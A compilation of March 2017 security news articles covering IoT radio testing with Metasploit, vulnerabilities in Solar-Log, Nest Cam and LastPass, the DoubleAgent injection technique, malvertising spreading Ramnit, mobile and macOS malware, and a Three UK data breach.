We have to consider that IoT devices are pervading our day life such as into modern businesses. IoT devices are enlarging our surface of attack, for this reason, the availability of tools that allow rapidly test them is essential to prevent cyber attacks.

The new Metasploit extension, the Metasploit RFTransceiver radio frequency testing extension, allows researchers to discover security flaws in in IoT radio communications.

“Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas,” writes Craig Smith, Transportation Research Lead at Rapid7 in a blog announcement today. These same devices can often contain flaws that can be used by attackers, but are unknown to the user.

Using the RFTransceiver companies will “be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.”

Smith took as an example the discovery of a vulnerability in a medical insulin pump made in 2016 by researchers at Rapid7.

One of the most disconcerting discoveries made by the researcher was that the remote control and the pump communicated over an unencrypted channel. An attacker might have exploited a flaw tracked as CVE-2016-5084 to launch a man-in-the-middle (MitM) attack to intercept patient treatment and device data. The only consolation is that data exposed do not include any personally identifiable information.

“We strongly believe that RF testing is an incredibly important — though currently often overlooked — component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk.” wrote Smith, “We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.”

Many organizations already use devices operating on radio frequencies outside 802.11. RFID readers, components using the Zigbee communication protocol, and surveillance systems.

The RFTransceiver extension is designed to help organizations testing them and evaluate the response to outside interference.

The new Metasploit RFTransceiver radio frequency extension could be used for testing purposes but there is the risk that crooks could abuse its capabilities to find vulnerabilities and exploit them.

The response to the common criticism of any kind of “dual use” technology is that bad guy are already exploiting it as the attack vector, for this reason, it is important to understand and anticipate the attackers’ moves.

“The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.”

Experts that want to use the new Metasploit RFTransceiver extension have to buy an RfCat-compatible device like the Yard Stick One. Then they need to download the latest RfCat drivers, included with those drivers they will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

“This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.” concluded Smith. “Then you can connect with the hardware bridge:

To learn more about the RFTransceiver, you can download the latest Metasploit here: https://www.rapid7.com/products/metasploit/download/community/“


Vulnerabilities Found in Popular Solar Park Monitoring System

22.3.2017 securityweek Vulnerebility
Vulnerabilities in solar park monitoring devices

Researchers at IT security services company SEC Consult have discovered several potentially serious vulnerabilities in solar park monitoring systems from Solar-Log. The vendor has released a firmware update to patch the flaws.

Solare Datensysteme’s Solar-Log was recently named the largest vendor for residential and commercial photovoltaic (PV) monitoring. The company says its products have been used to monitor more than 260,000 solar plants worldwide.

An advisory published on Wednesday by SEC Consult shows that the firm has identified a total of seven vulnerabilities. The security holes have been discovered after testing Solar-Log 1200 devices running firmware version 3.5.2-85 and Solar-Log 800e with firmware version 2.8.4-56. Other models are likely also affected considering that they use the same firmware.

SEC Consult told SecurityWeek it has identified tens of thousands of potentially vulnerable devices that can be reached directly from the Internet.

The security holes include an information disclosure flaw that allows an unauthenticated attacker to download a configuration file containing login credentials, and a cross-site request forgery (CSRF) that can be leveraged to modify or remove a device’s password by getting a logged-in user to click on a malicious link.

Another flaw allows an unauthenticated attacker to upload arbitrary files to the Solar-Log system using specially crafted POST requests.

Other vulnerabilities are related to the Beck IPC@CHIP embedded controller used by the Solar-Log monitoring devices. One of these flaws, known since 2001 (CVE-2001-1341), allows an attacker to obtain potentially sensitive information on the network configuration.

Other IPC@CHIP-related bugs can be exploited to change network configurations, cause a denial-of-service (DoS) condition, and reprogram the device’s flash memory. While some of the flaws may exist due to outdated IPC@CHIP software/firmware, SEC Consult pointed out that some attacks are possible because Solar-Log has failed to implement password protection functionality made available by Beck.

The information disclosure, CSRF and arbitrary file upload vulnerabilities can be exploited over the Internet is most cases, while the other weaknesses can be exploited by an attacker with network access to the devices, SEC Consult told SecurityWeek.

The vendor said it addressed the vulnerabilities with the release of firmware version 3.5.3-86, but SEC Consult could not confirm that the flaws have been patched properly.


Malvertising Campaign Targets Adult Websites to Distribute Ramnit Worm

22.3.2017 securityweek  Virus
A new malvertising campaign has been discovered using popular adult websites (each with several million visits per month) to target primarily Canadian and UK visitors. Using pop-under ads, victims were ultimately directed to the RIG exploit kit which sought to drop Ramnit.

Malwarebytes lead malware intelligence analyst Jerome Segura reports that a campaign using the ExoClick ad network sought to infect victims with the Ramnit information-stealing worm.

An earlier Ramnit botnet was dismantled in a joint operation involving security firms and European police agencies in February 2015; but the malware returned before the end of the year. This was followed by a quiet period until a new version, possibly with a new master, emerged in the summer of 2016.

Pop-under ads are triggered when a user clicks on an item on the site they are visiting. Doing so in this instance launched a pop-under window behind the main page. Redirection from here loaded mostly benign adult portals and offers -- but a 302 redirect also went to a malicious site that performed geolocation fingerprinting before loading the RIG exploit kit.

The danger with malvertising is that it is invisible to the eye and effective from trusted sites. One method of mitigating this threat is to use an ad blocker which prevents all third-party ads, both benign and malicious, from being loaded. Publishers, however, are increasingly detecting such software and not allowing visitors to see the content. This is, strictly speaking, illegal within the European Union, but still happens.

A second defense is to rely on an up-to-date mainstream anti-virus product and hope that it detects the malvertising payload. Segura recommends both. "Ad-blockers are quite effective as a first line of defense to stop malvertising in general," he told SecurityWeek, "while security products will mitigate exploits and malware payload. One solution should not replace the other and they actually complement each other nicely."

Ramnit has evolved into effective banking fraud malware. The geolocation used in this campaign seeks to target Canada and the UK -- two areas that have been repeatedly targeted by Ramnit. "The creators of the Ramnit Trojan (or any banking Trojan for that matter)," explains Segura, "need to have an understanding of each country's financial institutions in order to develop the appropriate tools (webinjects) to capture user information who do online banking. The choice could be motivated simply by the return on investment, likelihood of being detected but also general availability of money mules to transfer funds." Canadian and UK banks are clearly well-understood by the criminals behind the malware.

In this campaign (which has now been blocked by ExoClick), the prime target is individual adults. It would be wrong, however, to assume that malvertising is primarily a consumer threat. Relaxed attitudes to staff using their own devices at work and using the internet to keep up with news makes everyone susceptible.

"Malvertising isn't just a consumer threat in the sense that any user today is exposed to rogue online adverts, whether it is at home or at work," warns Segura. "Online crooks abuse ad networks to insert malicious redirections into their creative effectively making malvertising a precise and targeted delivery mechanism for malware. Therefore, consumers may be served a different payload than businesses while the distribution via malicious ads remains the same."


Multiple Vulnerabilities Uncovered in Google Nest Cam

22.3.2017 securityweek Vulnerebility  
A security researcher took it to GitHub to disclose information on multiple vulnerabilities allegedly affecting Nest Cam and Dropcam Pro devices after receiving no response from Google for several months.

The issues were discovered by security researcher Jason Doyle and affect the devices’ Bluetooth connectivity, allowing an attacker to access the affected device remotely or knock it offline for 60 to 90 seconds. Basically, a burglar capable of shutting the camera down could slip past it unnoticed.

Doyle revealed that three vulnerabilities impact the Bluetooth (BLE) connectivity of Dropcam, Dropcam Pro, Nest Cam Indoor/Outdoor models running firmware version 5.2.1. The researcher reveals that Google, which bought Nest several years ago, was notified on the issue on October 26, 2016. The company even acknowledged the bugs, but hasn’t released a fix to date.

The first bug is a buffer overflow condition that can be triggered when setting the SSID parameter on the camera. According to the researcher, an attacker exploiting the issue would have to be within Bluetooth range at any time during the camera’s powered on state. This is possible, however, because Bluetooth on the device is never disabled, not even after initial setup.

Another buffer overflow condition can be triggered when setting the encrypted password parameter on the camera. Similarly, the attacker must be in Bluetooth range of the device. The attack results in the camera to crash and reboot back to operational state.

The third issue, the researcher reveals, could allow an attacker to temporarily disconnect the camera from its Wi-Fi connection by supplying it with a new SSID to connect to. Because the affected cameras don’t come with support for local storage of video footage, the surveillance capabilities of the targeted device are temporarily disabled.

This attack can be leveraged to knock the camera offline while it attempts association with the newly set SSID. The device goes offline for around 60-90 seconds before re-connecting to the original Wi-Fi network and resuming normal operation.

The security researcher published all of the details pertaining to the three vulnerabilities, complete with example exploits.


LastPass Flaws Allow Hackers to Steal Passwords

22.3.2017 securityweek Hacking

Critical vulnerabilities found in the Chrome and Firefox extensions of the LastPass password manager can be exploited to steal passwords, warned Google Project Zero researcher Tavis Ormandy.

The expert has discovered several flaws, but only one of them appears to have been patched by LastPass developers.

Ormandy first reported finding a vulnerability in the Firefox version of the LastPass extension (version 3.3.2). The details of the security hole have not been made public. LastPass, which has 90 days to release a fix before details are disclosed by Project Zero, says it’s aware of the flaw and its security team is working on a patch.

Follow
LastPass ✔ @LastPass
We are aware of reports of a Firefox add-on vulnerability. Our security is investigating and working on issuing a fix.
1:17 AM - 22 Mar 2017
56 56 Retweets 72 72 likes

On Tuesday, the Project Zero researcher reported finding another vulnerability that affected both the Chrome and Firefox versions of LastPass. The weakness allowed a hacker to steal a user’s passwords and, if the binary component was enabled, execute arbitrary code via remote procedure call (RPC) commands. The attack could have been carried out by getting the targeted user to access a specially crafted web page.

LastPass implemented a temporary mitigation within hours after learning of the flaw’s existence, and claimed to have fully patched the issue on the server side soon after. Users are not required to take any action.

Ormandy has made public the details of this vulnerability, including proof-of-concept (PoC) code, and LastPass has promised to publish a blog post of its own to provide more information.

According to Ormandy, the flaw existed due to the websiteConnector.js content script proxying unauthenticated messages to the extension, giving an attacker complete access to internal LastPass RPC commands (e.g. for copying or filling in passwords).

Shortly after LastPass announced the fix, the expert said on Twitter that he identified another vulnerability that can be exploited to steal passwords for any domain.

This is not the only web browser extension analyzed by Ormandy. The expert previously reported finding flaws in Cisco WebEx, AVG Web TuneUp, and an extension installed silently by Adobe with Acrobat and Reader updates.


Once again Three mobile customers in UK experienced data breach
22.3.2017 securityaffairs Incindent

UK Three mobile customers experienced a new data breach, this time a technical issue caused the exposure of their personal details.
It has happened again, customers of the company Three UK experienced a new data breach.
Some customers logging into their accounts were able to view personal data (names, addresses, phone numbers) and call histories of other users.

The company promptly started an internal investigation and urged those affected to contact the customer service, it also confirmed that no financial data was exposed.

The Guardian confirmed that several customers were affected, it reported the case of several users presented with the data usage and call and text history of others when they logged in on Sunday night.

One customer cited by The Guardian, Mark Thompson, said it was a “shocking breach of data privacy”. He wrote on Three UK’s Facebook page: “Care to explain just how my details have been shared, how many people have had access to my personal information, for how long, and how many of your other customers have had their details leaked by yourselves to other members of the public as well?”

three mobile uk-data-breach

Three UK has 9 million customers in the UK, but according to the company only a small portion of customers has been affected by the issue.

“We are aware of a small number of customers who may have been able to view the mobile account details of other Three users using My3,” a spokesman said. “No financial details were viewable during this time and we are investigating the matter.”

The Information Commissioner’s Office announced it “will be looking into this potential incident involving Three”.

“Data protection law requires organisations to keep any personal information they hold secure. It’s our job to act on behalf of consumers to see whether that’s happened and take appropriate action if it has not.” said a spokeswoman from the ICO.

It isn’t the first time Three UK makes the headlines, in November 2016 the mobile carrier confirmed a major cyber security breach which exposed personal data of a portion of its customers, roughly 133,000 users.

Authorities arrested three men for this crime.


Unpatchable 'DoubleAgent' Attack Can Hijack All Windows Versions — Even Your Antivirus!
22.3.2017 thehackernews Vulnerebility

A team of security researchers from Cybellum, an Israeli zero-day prevention firm, has discovered a new Windows vulnerability that could allow hackers to take full control of your computer.
Dubbed DoubleAgent, the new injecting code technique works on all versions of Microsoft Windows operating systems, starting from Windows XP to the latest release of Windows 10.
What's worse? DoubleAgent exploits a 15-years-old undocumented legitimate feature of Windows called "Application Verifier," which cannot be patched.
Application Verifier is a runtime verification tool that loads DLLs (dynamic link library) into processes for testing purpose, allowing developers quickly detect and fix programming errors in their applications.
Unpatchable Microsoft Application Verifier Exploit
The vulnerability resides in how this Application Verifier tool handles DLLs. According to the researchers, as part of the process, DLLs are bound to the target processes in a Windows Registry entry, but attackers can replace the real DLL with a malicious one.
Simply by creating a Windows Registry key with the name same as application he wants to hijack, an attacker can provide his own custom verifier DLL he would like to inject into a legitimate process of any application.
Once the custom DLL has been injected, the attacker can take full control of the system and perform malicious actions, such as installing backdoors and persistent malware, hijacking the permissions of any existing trusted process, or even hijacking other users’ sessions.
Here's how the Cybellum researchers say this attack can work:
"DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victim’s process boot, giving the attacker full control over the process and no way for the process to protect itself."
Using DoubleAgent Attack to Take Full Control of Anti-Virus

In order to demonstrate the DoubleAgent attack, the team hijacked anti-virus applications -- which is the main defense on systems to prevent any malware from running -- using their technique and turn them into malware.
The team was able to corrupt the anti-virus app using the DoubleAgent attack and get the security software to act as disk-encrypting ransomware.
The attack works on every version of Windows OS from Windows XP to Windows 10 and is hard to block because the malicious code can be re-injected into the targeted legitimate process after the system reboots – Thanks to the persistent registry key.
The researchers said most of the today's security products on the market are susceptible to the DoubleAgent attacks. Here's the list of affected security products:
Avast (CVE-2017-5567)
AVG (CVE-2017-5566)
Avira (CVE-2017-6417)
Bitdefender (CVE-2017-6186)
Trend Micro (CVE-2017-5565)
Comodo
ESET
F-Secure
Kaspersky
Malwarebytes
McAfee
Panda
Quick Heal
Norton
After hijacking the anti-virus software, attackers can also use the DoubleAgent attack to disable the security product, making it blind to malware and cyber attacks, using the security product as a proxy to launch attacks on the local computer or network, elevating the user privilege level of all malicious code, hiding malicious traffic or exfiltrate data, or damaging the OS or causing a denial of service.
Note: Cybellum researchers only focused on anti-virus programs, though the DoubleAgent attack could work with any application, even Windows operating system itself.
Many Antiviruses Still Unpatched Even After 90 Days Of Responsible Disclosure
Cybellum said the company had reported the DoubleAgent attack to all affected anti-virus vendors more than 90 days ago.
Cybellum researchers have been working with some anti-virus companies to patch the issue, but so far, only Malwarebytes and AVG have released a patch, while Trend-Micro has planned to release one soon, as well.
So, if you use any of the three apps mentioned above, you are strongly advised to update it as soon as possible.
As a mitigation, the researchers note that the simplest fix for antivirus vendors is to switch from Application Verifier to a newer architecture called Protected Processes.
Protected processes mechanism protects anti-malware services against such attacks by not allowing other apps from injecting unsigned code, but this mechanism has so far been implemented only in Windows Defender, which was introduced by Microsoft in Windows 8.1.
Cybellum has also provided a video demonstration of the DoubleAgent attack, showing how they turned an antivirus app into a ransomware that encrypts files until you pay up.
The company also posted proof-of-concept (PoC) code on GitHub, and two blog posts detailing the DoubleAgent attack.


Malvertising Campaign Targets Adult Websites to Distribute Ramnit Worm

21.3.2017 securityaffairs Virus

A new malvertising campaign has been discovered using popular adult websites (each with several million visits per month) to target primarily Canadian and UK visitors. Using pop-under ads, victims were ultimately directed to the RIG exploit kit which sought to drop Ramnit.

Malwarebytes lead malware intelligence analyst Jerome Segura reports that a campaign using the ExoClick ad network sought to infect victims with the Ramnit information-stealing worm.

An earlier Ramnit botnet was dismantled in a joint operation involving security firms and European police agencies in February 2015; but the malware returned before the end of the year. This was followed by a quiet period until a new version, possibly with a new master, emerged in the summer of 2016.

Pop-under ads are triggered when a user clicks on an item on the site they are visiting. Doing so in this instance launched a pop-under window behind the main page. Redirection from here loaded mostly benign adult portals and offers -- but a 302 redirect also went to a malicious site that performed geolocation fingerprinting before loading the RIG exploit kit.

The danger with malvertising is that it is invisible to the eye and effective from trusted sites. One method of mitigating this threat is to use an ad blocker which prevents all third-party ads, both benign and malicious, from being loaded. Publishers, however, are increasingly detecting such software and not allowing visitors to see the content. This is, strictly speaking, illegal within the European Union, but still happens.

A second defense is to rely on an up-to-date mainstream anti-virus product and hope that it detects the malvertising payload. Segura recommends both. "Ad-blockers are quite effective as a first line of defense to stop malvertising in general," he told SecurityWeek, "while security products will mitigate exploits and malware payload. One solution should not replace the other and they actually complement each other nicely."

Ramnit has evolved into effective banking fraud malware. The geolocation used in this campaign seeks to target Canada and the UK -- two areas that have been repeatedly targeted by Ramnit. "The creators of the Ramnit Trojan (or any banking Trojan for that matter)," explains Segura, "need to have an understanding of each country's financial institutions in order to develop the appropriate tools (webinjects) to capture user information who do online banking. The choice could be motivated simply by the return on investment, likelihood of being detected but also general availability of money mules to transfer funds." Canadian and UK banks are clearly well-understood by the criminals behind the malware.

In this campaign (which has now been blocked by ExoClick), the prime target is individual adults. It would be wrong, however, to assume that malvertising is primarily a consumer threat. Relaxed attitudes to staff using their own devices at work and using the internet to keep up with news makes everyone susceptible.

"Malvertising isn't just a consumer threat in the sense that any user today is exposed to rogue online adverts, whether it is at home or at work," warns Segura. "Online crooks abuse ad networks to insert malicious redirections into their creative effectively making malvertising a precise and targeted delivery mechanism for malware. Therefore, consumers may be served a different payload than businesses while the distribution via malicious ads remains the same."


Non-Targeted Malware Hits 3,000 Industrial Sites a Year: Study

21.3.2017 securityweek Virus
Malware attacks on ICS

Thousands of industrial facilities have their systems infected with common malware every year, and the number of attacks targeting ICS is higher than it appears, according to a study conducted by industrial cybersecurity firm Dragos.

There have been an increasing number of media reports on malware infections affecting critical infrastructure and other industrial facilities, and while attention from the press can have some benefits, most experts agree that overhyped media reporting is likely to have a negative impact on ICS security.

Existing public information on ICS attacks shows numbers that are either very high (e.g. over 500,000 attacks according to unspecified reports cited by Dragos), or very low (e.g. roughly 290 incidents per year reported by ICS-CERT). Dragos has set out to provide more realistic numbers on malware infections in ICS, based on information available from public sources such as VirusTotal, Google and DNS data.

As part of a project it calls MIMICS (malware in modern ICS), Dragos has identified roughly 30,000 samples of malicious ICS files and installers dating back to 2003. Non-targeted infections involving viruses such as Sivis, Ramnit and Virut are the most common, followed by Trojans that can provide threat actors access to Internet-facing environments.

The company’s analysis showed that approximately 3,000 unique industrial sites are hit by traditional, non-targeted malware every year. The actual number of affected organizations is likely higher, but Dragos believes this can be a useful base metric for the community.

These incidents may not be as severe as targeted attacks and they are unlikely to cause physical damage or pose a safety risk. However, they can cause liability issues and downtime to operations, which leads to increased financial costs, Robert M. Lee, CEO and founder of Dragos, told SecurityWeek.

One example provided by the expert is the incident involving a German nuclear energy plant in Gundremmingen, whose systems got infected with Conficker and Ramnit malware. The malware did not cause any damage and it was likely picked up by accident, but the incident did trigger a shutdown of the plant as a precaution.

Learn More at the 2017 Singapore ICS Cyber Security Conference

Dragos’ research has also showed that targeted ICS intrusions are not as rare as they appear to be. While Stuxnet, Havex and BlackEnergy are the only pieces of malware known to specifically target ICS systems, the security firm has identified a dozen intrusions involving ICS-themed malware.

These types of threats, disguised as legitimate ICS software, target operators and engineers. Dragos believes ICS-themed malware can be highly efficient in evading security products as many vendors simply don’t know how to tell apart legitimate from rogue ICS software.

One ICS-themed malware that attracted the attention of researchers has been disguised as software for Siemens programmable logic controllers (PLCs). The threat, described by Dragos as crimeware, has been submitted to public malware databases ten times between 2013 and March 2017. The samples were initially detected by antiviruses as false positives and later as a basic piece of malware.

“In short, there has been an active infection for the last 4 years of an adversary attempting to compromise industrial environments by theming their malware to look like Siemens control software,” Lee said in a blog post.

Dragos has not linked the Siemens-themed malware to a specific threat actor, Lee told SecurityWeek.

Another noteworthy finding of the MIMICS project is related to operational security (OPSEC). Researchers discovered that public malware databases often contain legitimate ICS software components that have been erroneously flagged as malicious. Experts identified various such components, including human-machine interface (HMI) and data historian installers, and key generators.

“This means that adversaries can simply download these software files and leverage access to them for their own learning and practicing,” Lee explained. “Keeping our legitimate software out of the hands of the adversaries helps lengthen the time it takes them to target our environments.”

Dragos has identified more than 120 project files in the public databases it has analyzed, including maintenance reports, Nuclear Regulatory Commission (NRC) reports, and substation layouts.

“There are a few lessons here: have a discussion with the IT security teams (outsourced or on-site) on what is legitimate and what should not be submitted to the internet, validate what your security technologies are submitting to databases such as VirusTotal [...], and be proactive in looking at such databases for your own files and information,” Lee said.


Metaspoit's New RFTransceiver Finds Security Flaws in IoT Radio Communications

21.3.2017 securityweek Vulnerebility
The Internet of Things is pervasive, rapidly growing, and largely insecure. Researchers have discovered security flaws in products ranging from baby alarms and dolls, to motor vehicles and medical equipment -- and the likelihood is that there are many more simply not yet discovered.

Metasploit has now released a new hardware bridge extension to help researchers and pentesters -- and IoT user organizations -- discover security flaws in IoT radio communications. While many of the known flaws are found in consumer devices, IoT devices are increasingly making their way into and onto business premises; and it is very difficult for security teams to control them.

"Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas," writes Craig Smith, Transportation Research Lead at Rapid7 in a blog announcement today. These same devices can often contain flaws that can be used by attackers, but are unknown to the user.

With Metasploit's new RFTransceiver radio frequency testing extension, companies will be able to better understand their true security posture. They will, suggests Smith, "be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises."

In October 2016, Rapid7 reported a vulnerability in a medical insulin pump. The pump was remotely controlled, but communication was sent between the controller and the device in cleartext rather than encrypted. This could allow a hacker to spoof the controller and trigger unauthorized insulin injections. The problem for security teams is that there is no easy way to know what communication happens between a device and its control server.

"We strongly believe," writes Smith, "that RF testing is an incredibly important -- though currently often overlooked -- component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands."

His "often overlooked" comment is valid and serious. Freelance security consultant and researcher Robin Wood (aka DigiNinja pentester) told SecurityWeek, "Being able to easily test RF that isn't the standard 802.11 wifi is going to be really useful for physical tests where clients are really switched on and want to know exactly what is going on in their environments.

"Unfortunately, at the moment I find this type of client is few and far between but, as the technology to do the testing gets cheaper and easier to use, hopefully more testers will start using it and offering it as a service which will then start drawing more clients in; in turn increasing the exposure of RF based devices and so creating a feedback loop."

Wood believes that the Metasploit capability will "make it easier for people to do research in this area which again will start to increase awareness and hopefully the overall security."

The danger, of course, is that criminal elements could also use Metasploit to find flaws suitable for exploiting. It is a criticism that has always been leveled against Metasploit, and one that Smith mentions. "The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things." But he adds that the bad guys are already doing bad things, and the best defense is to know what they can do. "Sunlight is the best disinfectant," he adds.

F-Secure is at least one security firm that agrees. "RF has traditionally been a fruitful attack vector," a spokesperson told SecurityWeek, "so maybe the availability of more tools in the field will improve that situation. When a widely-used tool like Metasploit starts offering a module that allows this sort of work, it lowers the entry barrier considerably. We may see more device manufacturers starting to pay attention to the RF attack vectors against their devices, but we are also almost certain to see more attacks from this angle as well."

At the same time, F-Secure is aware of the dangers. "This sort of technology is very much 'dual use' in the sense that while it is essential to security researchers and red teams, it can also be used as an attack tool by malicious parties."

Senior security consultant Taneli Kaivola added, "Now that the door has been opened for the wider public, we can expect to see the scope and capability of this tool expanding. I fully expect to see SDRs (software defined radios, adding additional frequencies) supported in the framework popping up like mushrooms in the rain."

Chester Wisniewski, principal research scientist at Sophos told SecurityWeek, primarily sees the dangerous side. "Rapid7 is correct that RF testing can be a critical component in many areas of security research, but it is very different from traditional pentesting tools. To me this is a concerning development. Take average hacker-types with no knowledge of RF and the regulatory frameworks designed to allow our devices to work and provide them a tool that can send and receive signals with almost no knowledge.

"What could possibly go wrong?" he asks. "Other than breaking just about anything that operates over RF in a difficult to detect manner... I just don't think making it a toolkit anyone can use is a good idea. Software-defined radios have already breached this wall, but I suspect simplifying their use will end in tears."


Attackers Can Hijack Security Products via Microsoft Tool

21.3.2017 securityweek Hacking
Researchers at Cybellum, an Israel-based company that specializes in zero-day prevention, have identified a new technique that can be used by attackers to take full control of security products.

The attack, dubbed by the security firm “DoubleAgent,” allegedly affects the products of several vendors, including Avast, AVG, Avira, Bitdefender, Trend Micro, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Panda, Quick Heal and Symantec (Norton). However, the company says only a few of the impacted vendors have released patches.

The attack involves the Microsoft Application Verifier, a runtime verification tool for unmanaged code that helps developers quickly find subtle programming errors in their applications. The tool, introduced with Windows XP, is installed by default and enabled on all versions of the operating system.

The tool works by loading a so-called “verifier provider DLL” into the targeted application’s process for runtime testing. Once it’s created, the DLL is added to the Windows Registry as a provider DLL for a specified process. Windows then automatically injects the DLL into all processes with the registered name.

According to Cybellum, this allows a piece of malware executed by a privileged user to register a malicious DLL for a process associated with an antivirus or other endpoint security product, and hijack its agent. Some security products attempt to protect the registry keys associated with their processes, but researchers have found a way to easily bypass this protection.

Once the malware hijacks a security product, it can abuse it for various tasks, including to get it to perform malicious operations on the attacker’s behalf, change whitelists/blacklists and internal logic, install backdoors, exfiltrate data, spread the malware to other machines, and encrypt or delete files (i.e. ransomware).

The security firm pointed out that the attack is difficult to block since the malicious code is injected into the process even after a reboot of the system, a software update, or reinstallation of the targeted product.

The DoubleAgent attack is said to work on all versions of Windows, including Windows 10, and any architecture. However, since the method relies on a legitimate tool, there is nothing Microsoft can do about it.

Slava Bronfman, co-founder and CEO of Cybellum, told SecurityWeek that DoubleAgent is ideal in the post-breach phase of an attack. “It's the missing part for every malware to become an advanced persistent threat (APT),” he said.

Cybellum will soon publish a blog post containing additional technical details and proof-of-concept (PoC) code. It has also made available a video showing how the attack works against a Norton product:

Cybellum says it has informed all affected antivirus vendors, but so far only Malwarebytes and AVG released patches, and Trend Micro promised to address the issue next week. The company decided to make its findings public after giving vendors more than 90 days to ensure that their products are not protected against potential attacks.

“The responsible thing to do now is to publish [the research], since attackers are examining other vendors’ patches and might use this attack,” Bronfman explained.

In addition to patching the vulnerability, Cybellum says such attacks can be prevented by antivirus vendors via protected processes, a concept introduced by Microsoft in Windows 8.1 for protecting anti-malware services against attacks. The Israeli company says the protection has so far only been implemented in Windows Defender.


Twitter Suspends More Accounts Linked to 'Terrorism'

21.3.2017 securityweek Social
Twitter said Tuesday it suspended 376,890 accounts in the second half of 2016 for "promotion of terrorism," an increase of 60 percent over the prior six-month period.

The latest suspensions bring the total number of blocked accounts to 636,248 from August 2015, when Twitter stepped up efforts to curb "violent extremism," the company announced as part of its latest transparency report.

The actions come with social networks under pressure from governments around the world to use technology tools to lock out jihadists and others who use the platforms to recruit and launch attacks.

Twitter said separately the number of government requests for user data rose seven percent from the prior six-month period, but affected 13 percent fewer accounts.

For requests to remove content -- from governments and others including copyright holders -- the number of requests was up 13 percent but the number of accounts fell 37 percent.

Twitter announced that the FBI had informed the social network it was no longer under a "gag order" that prevented the disclosure of five cases involving "national security letters" -- special requests from the US law enforcement agency in national security cases.

As a result, Twitter was able to inform the affected users of the FBI requests.

"As we continue to push for more transparency in how we can speak about national security requests, we will update this new section in future transparency reports," Twitter stated.

Twitter, which is pressured by certain governments to remove "hate speech," disclosed for the first time a partnership with a third-party research group called Lumen to catalog any information removed.

Twitter said it began the agreement with Lumen in 2010.

"Unless we are prevented from doing so, when we withhold content in a certain country Twitter will continue to provide a copy of the request to Lumen so anyone can see what type of content was removed and who made the request," the company said.

Another section of the transparency report was devoted to "legal removals," or requests to remove content from verified journalists and other media outlets.

"Given the concerning global trend of various governments cracking down on press freedom, we want to shine a brighter light on these requests," Twitter said.

It received 88 legal requests from around the world to remove content posted by verified journalists or news outlets, but did not take any action on the majority of the requests, "with limited exceptions in Germany and Turkey," which accounted for 88 percent of such requests.

"For example, we were compelled to withhold tweets sharing graphic imagery following terror attacks in Turkey in response to a court order," Twitter said.


"Swearing Trojan" Tactics Could Become Global Threat: Researchers

21.3.2017 securityweek Virus
Check Point security researchers have warned that tactics employed by a mobile Trojan targeting users in China might become a worldwide threat when adopted by Western malware.

Called the "Swearing Trojan", the threat was discovered not long ago by Tencent Security researchers, who revealed that the threat can steal bank credentials and other sensitive personal information from Android devices. The malware’s name comes from Chinese swear words that were found inside the malware’s code.

The Swearing Trojan can also bypass 2-factory authentication (2FA) security by replacing the original SMS app on the infected devices with an altered version, which allows it to intercept the one-time codes banks send to their users.

The malware was observed spreading through droppers that download malicious payloads on compromised devices, and via fake base transceiver stations (BTSs) that send phishing SMS messages purportedly coming from China Mobile and China Unicom, two of the largest Chinese telecom service providers. Similar tactics could be adopted by Western malware too, researchers say.

“Using a BTS to send fake messages is quite sophisticated, and the SMS content is very deceptive. The message tricks users into clicking a malicious URL which installs malware. Fake messages from people victims may be romantically involved with have also been seen in these attacks,” Check Point reveals.

Once the malware has infected a device, it starts sending automated phishing SMSs to the victims’ contacts. SMS messages spreading Swearing Trojan might also attempt to trick the victim into downloading a work related document, a picture of a memorable event or that of a cheating spouse, a video of a trending event, or even critical updates. The malware itself uses SMS or email to communicate with the command and control server.

As it turns out, the actors using this Trojan have been already arrested, but Check Point says the malware still remained active, likely because the attackers were part of a larger operation. What’s more, the researchers say that only 21cn.com email addresses were used in the initial campaign, but new attacks used other popular Chinese email service providers as well, including 163.com, sina.cn and qq.com.

Furthermore, new variants of the Swearing Trojan were observed in the wild recently, along with a trend to use Aliyun and other cloud service hosted email accounts. Some of these email addresses are using a mobile number as their user name, and inconsistencies between these numbers and the actual mobile number used in SMS suggest that the Trojan variants are repackaged at least twice.

“Many mobile malware discovered in the Chinese market in the past, such as HummingBad, turned out to be early birds which continued to spread worldwide. The widespread of the Swearing Trojan was achieved by using fake BTSs and automated phishing SMSs. Both of these threats can be adopted by western malware as well,” the researchers conclude.


Počítače Applu lze plně ovládnout na dálku. Umožňuje to zákeřný malware, který prošel schválením Applu
21.3.2017 Živě.cz Apple

Na uživatele počítačů značky Apple číhá nebezpečí v podobě malwaru zvaného Proton. Ten využívá bezpečnostní skuliny systému macOS a umožňuje počítač ovládnout na dálku, číst z něj data nebo jej zablokovat. Škodlivý kód lze přitom schovat do jakékoli aplikace, která následně bude podepsána platným bezpečnostním certifikátem. Na rizika s tím spojená upozornil Apple Insider.

Vytvořili jsme malware pro Android, ovládli telefon a odposlouchávali jej
Malware využívá doposud neopravené zranitelnosti v macOS, které umožní administrátorský přístup k počítači. Lze tak přistupovat prakticky ke všem funkcím a datům. Malware byl napsaný v Objective C, tedy nativním jazyce systému macOS, a není závislý na dalším softwaru či knihovnách.

Nejnebezpečnější je na softwaru skutečnost, že je podepsaná platným certifikátem ověřeného vývojáře. Díky tomu prošel schvalovacím procesem Applu a zprvu ho nezaregistrovala ani integrovaná antivirová ochrana XProtect. Ta už je nyní aktualizována a malware v poslední známé podobě odhalí. Bezpečnostní odborníci ovšem upozorňují, že se mohou objevit modifikace, které kontrole opět uniknou.

Klepněte pro větší obrázek
Lákavá nabídka na hackerském fóru (zdroj: Sixgill)

